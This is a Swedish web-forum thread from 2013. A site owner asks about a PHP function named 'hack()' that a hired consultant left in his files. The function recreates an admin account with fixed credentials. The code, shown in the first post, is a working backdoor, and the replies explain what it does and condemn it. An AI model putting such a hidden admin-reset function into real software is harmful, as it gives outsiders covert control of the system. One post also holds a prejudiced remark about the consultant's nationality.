| FAQ |
| Kalender |
2013-04-22, 16:38
|
#1 | ||
|
|||
|
Mycket flitig postare
|
Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig. Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng: Kod:
public function hack() {
$this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
$this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
}
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag.. |
||
|
 Svara med citat
|
Hur skulle ni reagera om en konsult gjorde en sån här kod?
|
2013-04-22, 16:42
|
#2 | ||
|
|||
|
Bara ett inlägg till!
|
Haha.
Hade avbrutit samarbetet omgående. Ger inte någon utvecklare tillgång till live-servrar, de måste lära sig jobba i en lokal miljö och sedan pusha kod till typ git. Ligger det då sådan kod för att få tillgång till livemiljön så kan de gå och jobba någon annanstans. |
||
|
|
Svara med citat
|
|
2013-04-22, 16:48
|
#3 | |||
|
||||
|
Mycket flitig postare
|
Haha, humor!
Eller ja, idioti, men för oss utomstående så är det lite komiskt. |
|||
|
|
Svara med citat
|
|
2013-04-22, 16:57
|
#4 | |||
|
||||
|
Klarade millennium-buggen
|
Avsluta samarbetet. Det där är så fel som det kan bli.
|
|||
|
|
Svara med citat
|
|
2013-04-22, 17:07
|
#5 | ||
|
|||
|
Mycket flitig postare
|
Nu vet jag inte hur mycket programmering i PHP du kan, xciso, men vad koden gör är att nollställa lösenordet till användaren "login" med lösenordet "pass".
Med andra ord fanns det funktionalitet för att logga in i ditt system utan din vetskap även om du bytt lösenord... Rätt allvarligt övertramp! |
||
|
|
Svara med citat
|
|
2013-04-22, 17:12
|
#6 | ||
|
|||
|
Mycket flitig postare
|
Mitt system är av open-source, och detta gör mig lite rädd att det faktiskt var så enkelt.
Koden skapar ju först ett admin konto med användarnamn "login" Jag håller på och sätter upp en ny version av sidan så jag har satt upp en VPS där jag gör allt och tanken var att sedan bara skifta ip så styrs min URL mot nya servern. På så sätt är det en "live" version.. Senast redigerad av xciso den 2013-04-22 klockan 17:16 |
||
|
|
Svara med citat
|
|
2013-04-22, 17:41
|
#7 | |||
|
||||
|
Mycket flitig postare
|
Svårt att smyga med ett sådant namn på funktionen.
|
|||
|
|
Svara med citat
|
|
2013-04-22, 17:45
|
#8 | ||
|
|||
|
Mycket flitig postare
|
Konsulten tycker jag är paranoid, men jag ser mer som att han kan ligga och lura med koden i mitt system och om ett år gå in och ändra mitt tex paypal id till hans och på så sätt komma åt en bra summa då alla köp hamnar i hans plånbok..
Han har även utvecklat ett flertal moduler, och visst skulle ha då istället kunna implementera denna kod i alla moduler han säljer och utvecklar, men jag tycker ändå detta är skumt. |
||
|
|
Svara med citat
|
|
2013-04-22, 17:52
|
#9 | |||
|
||||
|
Klarade millennium-buggen
|
Nej du är inte paranoid. Det verkar som om konsulten anser att alla som inte är godtrogna är paranoida. I så fall är jag hellre paranoid.
|
|||
|
|
Svara med citat
|
|
2013-04-22, 17:55
|
#10 | ||
|
|||
|
Mycket flitig postare
|
Då är vi 2
 Dock lite tråkigt när jag tycker han verkat reko, och är billig. Han är från Tjeckien, vilket kanske inte gör saken bättre.. Dock är priset på $20/h bra 
|
||
|
|
Svara med citat
|
| Svara |
«
Föregående ämne
|
Nästa ämne
»
Linjär visning
|
|
Alla tider är GMT +2. Klockan är nu 18:49.